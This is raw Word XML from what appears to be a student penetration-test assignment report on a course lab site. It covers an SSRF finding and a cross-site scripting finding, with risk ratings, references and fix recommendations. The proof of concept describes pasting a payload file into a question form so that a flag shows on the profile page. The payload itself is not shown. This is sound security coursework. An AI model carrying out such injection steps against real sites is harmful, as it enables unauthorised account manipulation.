            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2C93CBF9" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="16" w:name="_Toc71488335"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:bookmarkEnd w:id="16"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7D6BDD53" w14:textId="09D64440" w:rsidR="007B5DA2" w:rsidRDefault="007D7D0E" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">High: </w:t>
            </w:r>
            <w:r>
              <w:t>This vulnerability’s impact is major, and likelihood is possible, according to ISO31000 Risk Matrix (</w:t>
            </w:r>
            <w:hyperlink w:anchor="A1" w:history="1">
              <w:r w:rsidRPr="00D705B9">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Appendix 1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t>), the risk rating is high.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="0C2FC081" w14:textId="77777777" w:rsidTr="002917EE">
        <w:trPr>
          <w:trHeight w:val="695"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39644349" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="17" w:name="_Toc71488336"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:bookmarkEnd w:id="17"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="71027C62" w14:textId="72D676F0" w:rsidR="007D7D0E" w:rsidRDefault="007D7D0E" w:rsidP="007D7D0E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:hyperlink r:id="rId16" w:history="1">
              <w:r w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/ssrf</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="56761C7D" w14:textId="7ABFBCBD" w:rsidR="007B5DA2" w:rsidRDefault="007D7D0E" w:rsidP="007D7D0E">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:t>2] Lecture 13 – SSRF slides</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="08DADFD3" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="1EF8C738" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="18" w:name="_Toc71488337"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="18"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="48FF6538" w14:textId="0A22D083" w:rsidR="007B5DA2" w:rsidRDefault="007D7D0E" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Use a whitelist services by the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>validate.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> application, if any </w:t>
            </w:r>
            <w:r w:rsidR="00A25ADA">
              <w:t>input URL</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A25ADA">
              <w:t xml:space="preserve">is </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">not in </w:t>
            </w:r>
            <w:r w:rsidR="00A25ADA">
              <w:t xml:space="preserve">the </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">whitelist, </w:t>
            </w:r>
            <w:r w:rsidR="00A25ADA">
              <w:t xml:space="preserve">the application can </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">response </w:t>
            </w:r>
            <w:r w:rsidR="00A25ADA">
              <w:t>a string set in advance.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="32E4C2C2" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>
    <w:p w14:paraId="0D105BAE" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4799D576" w14:textId="05447F50" w:rsidR="00B97362" w:rsidRDefault="006750D3">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc71488338"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Finding </w:t>
      </w:r>
      <w:r w:rsidR="00FD2C45">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00C10E9D">
        <w:t>Cross-Site Scripting in Anonymous Question Page</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidR="00C10E9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16450E59" w14:textId="77777777" w:rsidR="00B97362" w:rsidRDefault="00B97362"/>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7B5DA2" w14:paraId="2719C239" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="36B60FEA" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="20" w:name="_Toc71488339"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
            <w:bookmarkEnd w:id="20"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="018D5C47" w14:textId="1C6B1E5A" w:rsidR="007B5DA2" w:rsidRDefault="00C10E9D" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">For </w:t>
            </w:r>
            <w:r w:rsidR="00FF7098">
              <w:t>DOM-based</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> cross-site scripting, an attacker needs to be able to post on the website, while it can be done in Anonymous Question page. After pasting the content of xss2.txt into the input box, and click “SUBMIT QUESTION”, the script will be received and executed by the server. As a result, we can see the change in User Profile page.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="3BA7CD42" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="223CC18D" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="21" w:name="_Toc71488340"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Proof of Concept</w:t>
            </w:r>
            <w:bookmarkEnd w:id="21"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="0FDA1016" w14:textId="2B572B50" w:rsidR="00B90521" w:rsidRDefault="00C10E9D" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>For a quick access, after login, only need to copy and paste the content of XSS2.txt i</w:t>
            </w:r>
            <w:r w:rsidR="002917EE">
              <w:t xml:space="preserve">nto input box of </w:t>
            </w:r>
            <w:r>
              <w:t>Anonymous Question page(</w:t>
            </w:r>
            <w:hyperlink r:id="rId17" w:history="1">
              <w:r w:rsidR="00667EC7" w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/question.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidR="00667EC7">
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="002917EE">
              <w:t xml:space="preserve"> click </w:t>
            </w:r>
            <w:r>
              <w:t>submit. Then visit User Profile page(</w:t>
            </w:r>
            <w:hyperlink r:id="rId18" w:history="1">
              <w:r w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>http://assignment-hermes.unimelb.life/profile.php</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">), and the Flag has been displayed. For a detailed walkthrough and explanation, see </w:t>
            </w:r>
            <w:hyperlink w:anchor="A2_s3" w:history="1">
              <w:r w:rsidRPr="00C10E9D">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Appendix 2, Section 3</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="19283AE6" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="2F7A3415" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="22" w:name="_Toc71488341"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Impact</w:t>
            </w:r>
            <w:bookmarkEnd w:id="22"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7E2CD65A" w14:textId="42283B2F" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
            <w:r w:rsidR="00C10E9D">
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:r w:rsidR="00C10E9D">
              <w:t xml:space="preserve">This XSS is based on information disclosure, and can only work on one function, which can change users’ probation status. </w:t>
            </w:r>
            <w:r w:rsidR="00EB7973">
              <w:t>If you want to access other files through this XSS injection point, the website will pop up hacker detected. Thus</w:t>
            </w:r>
            <w:r w:rsidR="00940FB5">
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="00EB7973">
              <w:t xml:space="preserve"> I think t</w:t>
            </w:r>
            <w:r w:rsidR="00C10E9D">
              <w:t xml:space="preserve">he effect is limited, </w:t>
            </w:r>
            <w:r w:rsidR="00EB7973">
              <w:t>and this vulnerability should be moderate.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="03D27BFD" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="37685B4D" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="23" w:name="_Toc71488342"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Likelihood</w:t>
            </w:r>
            <w:bookmarkEnd w:id="23"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="39837955" w14:textId="1B485D19" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Possible: </w:t>
            </w:r>
            <w:r w:rsidR="00940FB5">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00EB7973">
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> see this cross-site scripting as possible, because only authenticated users can use the Anonymous Question functionality. If an attacker wants to exploit this vulnerability, firstly, he needs a valid login credentials to authenticate into the web application.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="187EBC6E" w14:textId="77777777" w:rsidTr="002917EE">
        <w:trPr>
          <w:trHeight w:val="742"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3CEB3EAD" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="24" w:name="_Toc71488343"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Risk Rating</w:t>
            </w:r>
            <w:bookmarkEnd w:id="24"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="7A7FEB9C" w14:textId="7E40092A" w:rsidR="007B5DA2" w:rsidRDefault="00940FB5" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t xml:space="preserve">Medium: </w:t>
            </w:r>
            <w:r>
              <w:t>This vulnerability’s impact is moderate, and likelihood is possible, according to ISO31000 Risk Matrix (</w:t>
            </w:r>
            <w:hyperlink w:anchor="A1" w:history="1">
              <w:r w:rsidRPr="00D705B9">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                </w:rPr>
                <w:t>Appendix 1</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve">), the risk rating is </w:t>
            </w:r>
            <w:r w:rsidR="00381A8D">
              <w:t>medium</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="52BDFB8A" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="510F8C12" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="25" w:name="_Toc71488344"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>References</w:t>
            </w:r>
            <w:bookmarkEnd w:id="25"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="78FB947D" w14:textId="7CBC8276" w:rsidR="007B5DA2" w:rsidRDefault="00C10E9D" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:hyperlink r:id="rId19" w:history="1">
              <w:r w:rsidRPr="008960FA">
                <w:rPr>
                  <w:rStyle w:val="a9"/>
                  <w:bCs/>
                </w:rPr>
                <w:t>https://portswigger.net/web-security/cross-site-scripting</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="5C7D6CA6" w14:textId="75BCB3EF" w:rsidR="00C10E9D" w:rsidRPr="00C10E9D" w:rsidRDefault="00C10E9D" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:bCs/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>2] Lecture 2 – XSS slides</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B5DA2" w14:paraId="662580EC" w14:textId="77777777" w:rsidTr="006D0F04">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2595" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="5D67B1CD" w14:textId="77777777" w:rsidR="007B5DA2" w:rsidRDefault="007B5DA2" w:rsidP="006D0F04">
            <w:pPr>
              <w:pStyle w:val="3"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="26" w:name="_Toc71488345"/>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Recommendation</w:t>
            </w:r>
            <w:bookmarkEnd w:id="26"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:tcMar>
              <w:top w:w="100" w:type="dxa"/>
              <w:left w:w="100" w:type="dxa"/>
              <w:bottom w:w="100" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="3B8BFF59" w14:textId="31A3498D" w:rsidR="007B5DA2" w:rsidRDefault="00940FB5" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:t>First</w:t>
            </w:r>
            <w:r w:rsidR="00430071">
              <w:t>ly</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, developers of this website should hide the details of function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pass_probation</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>. For example, put the code of this function in different file and only reference it when needed.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E1CE90D" w14:textId="7AB7E87E" w:rsidR="00940FB5" w:rsidRDefault="00940FB5" w:rsidP="006D0F04">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
            <w:r>
              <w:t>econd</w:t>
            </w:r>
            <w:r w:rsidR="00430071">
              <w:t>ly</w:t>
            </w:r>
            <w:r>
              <w:t>, the website should encode data on output before user-controllable data is written to a page</w:t>
            </w:r>
            <w:r w:rsidR="00430071">
              <w:t>, which can make users’ data not able to execute</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
